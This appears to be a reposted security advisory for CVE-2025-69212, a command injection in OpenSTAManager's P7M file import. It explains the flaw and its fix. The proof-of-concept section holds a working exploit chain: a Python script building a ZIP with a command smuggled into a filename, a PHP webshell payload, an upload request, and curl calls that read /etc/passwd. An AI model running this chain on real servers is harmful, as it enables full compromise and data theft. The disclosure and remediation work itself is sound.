Share
## https://sploitus.com/exploit?id=PACKETSTORM:218760
# CVE-2025-69212: OpenSTAManager has an OS Command Injection in P7M File Processing
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | [CVE-2025-69212](https://nvd.nist.gov/vuln/detail/CVE-2025-69212) |
    | **Severity** | CRITICAL |
    | **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36) |
    | **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |
    
    ## Affected Products
    
    - **devcode-it/openstamanager** (versions: <= 2.9.8)
    
    
    ## CWE Classification
    
    - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
    
    ## Details
    
    ## Summary
    A critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.
    
    
    ## Vulnerable Code
    **File:** `src/Util/XML.php:100`
    
    ```php
    public static function decodeP7M($file)
    {
        $directory = pathinfo($file, PATHINFO_DIRNAME);
        $content = file_get_contents($file);
    
        $output_file = $directory.'/'.basename($file, '.p7m');
    
        try {
            if (function_exists('exec')) {
                // VULNERABLE - No input sanitization!
                exec('openssl smime -verify -noverify -in "'.$file.'" -inform DER -out "'.$output_file.'"', $output, $cmd);
    ```
    
    **The Problem:**
    - The `$file` parameter is passed directly into `exec()` without sanitization
    - Although wrapped in double quotes, an attacker can escape them
    - The filename comes from uploaded ZIP archives (user-controlled)
    
    ## Attack Vector
    
    ### Entry Points:
    1. **plugins/importFE_ZIP/actions.php:126** (when automatic import is enabled)
       ```php
       foreach ($files_xml as $xml) {
           if (string_ends_with($xml, '.p7m')) {
               $file = XML::decodeP7M($directory.'/'.$xml);  // $xml from ZIP!
       ```
    
    2. **plugins/importFE/src/FatturaElettronica.php:56** (constructor)
       ```php
       if (string_ends_with($name, '.p7m')) {
           $file = XML::decodeP7M($this->file);  // $name from user input!
       ```
    
    ### Attack Flow:
    1. Attacker creates ZIP with malicious filename
    2. Upload ZIP via importFE_ZIP plugin
    3. Application extracts ZIP and iterates files
    4. For `.p7m` files, `decodeP7M()` is called
    5. Malicious filename is injected into `exec()` command
    6. Arbitrary command executes as web server user
    
    ## Proof of Concept
    
    **โš ๏ธ IMPORTANT NOTE:** PHP's `ZipArchive::extractTo()` splits filenames on `/` character. Payload must NOT contain `/` in commands. Use `cd directory && command` instead of absolute paths.
    
    ### Step 1: Create Malicious ZIP
    
    ```python
    import zipfile
    
    cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
    malicious_filename = f'invoice.p7m";{cmd};echo ".p7m'
    
    with zipfile.ZipFile('exploit.zip', 'w') as zf:
        zf.writestr(malicious_filename, b"DUMMY_P7M_CONTENT")
    ```
    
    ### Step 2: Upload ZIP
    
    ```http
    POST /actions.php HTTP/1.1
    Host: localhost:8081
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBKunENXxjEx5VrRc
    Cookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b
    
    ------WebKitFormBoundaryBKunENXxjEx5VrRc
    Content-Disposition: form-data; name="blob1"; filename="exploit.zip"
    Content-Type: application/zip
    
    [ZIP CONTENT]
    ------WebKitFormBoundaryBKunENXxjEx5VrRc--
    Content-Disposition: form-data; name="op"
    
    save
    
    ------WebKitFormBoundaryBKunENXxjEx5VrRc
    Content-Disposition: form-data; name="id_module"
    
    14
    ------WebKitFormBoundaryBKunENXxjEx5VrRc
    Content-Disposition: form-data; name="id_plugin"
    
    48
    ------WebKitFormBoundaryBKunENXxjEx5VrRc--
    ```
    <img width="2539" height="809" alt="image" src="https://github.com/user-attachments/assets/f39cf6ad-9e8d-41de-866e-e01ec2064fd1" />
    
    <img width="1543" height="659" alt="image" src="https://github.com/user-attachments/assets/41fbd038-0bce-4b1c-bdc3-8ddcf3bf13be" />
    
    ### Step 3: Exploitation Result
    
    **Response (500 error is expected - XML parsing fails AFTER command execution):**
    ```http
    HTTP/1.1 500 Internal Server Error
    {"error":{"type":"Exception","message":"Start tag expected, '<' not found"}}
    ```
    
    **Verification - Webshell Created:**
    
    <img width="1111" height="239" alt="image" src="https://github.com/user-attachments/assets/d2e36cf3-c438-4509-be46-36d5c6f3e0d1" />
    
    ### Step 4: Remote Code Execution
    
    **Webshell is publicly accessible without authentication:**
    
    ```bash
    $ curl "http://localhost:8081/files/SHELL.php?c=id"
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
    $ curl "http://localhost:8081/files/SHELL.php?c=cat+/etc/passwd"
    [Full /etc/passwd output]
    ```
    <img width="698" height="475" alt="image" src="https://github.com/user-attachments/assets/7ee4630b-95a8-450c-bdce-d6f703c8168d" />
    
    
    ## Impact
    
    - **Remote Code Execution:** Full server compromise
    - **Data Exfiltration:** Access to all application data and database
    - **Privilege Escalation:** Potential escalation if web server runs with elevated privileges
    - **Persistence:** Install backdoors and maintain access
    - **Lateral Movement:** Pivot to other systems on the network
    
    ## Prerequisites
    
    - Authenticated user with access to invoice import functionality
    
    ## Remediation
    
    ###  Input Sanitization
    
    ```php
    public static function decodeP7M($file)
    {
        // Validate that file path doesn't contain shell metacharacters
        if (preg_match('/[;&|`$(){}\\[\\]<>]/', $file)) {
            throw new \Exception('Invalid file path');
        }
    
        // Better: use escapeshellarg()
        $safe_file = escapeshellarg($file);
        $safe_output = escapeshellarg($output_file);
    
        exec("openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output", $output, $cmd);
    }
    ```
    or
    
    ### Validate Filename Before Processing
    
    ```php
    // In the upload handler, validate filenames from ZIP
    foreach ($files_xml as $xml) {
        // Only allow alphanumeric, dots, dashes, underscores
        if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
            continue; // Skip invalid filenames
        }
    
        if (string_ends_with($xml, '.p7m')) {
            $file = XML::decodeP7M($directory.'/'.$xml);
        }
    }
    ```
    
    
    ## Credit
    Discovered by: ลukasz Rybak
    
    ## References
    
    - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36
    - https://nvd.nist.gov/vuln/detail/CVE-2025-69212
    - https://github.com/advisories/GHSA-25fp-8w8p-mx36
    
    
    ## Disclaimer
    
    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.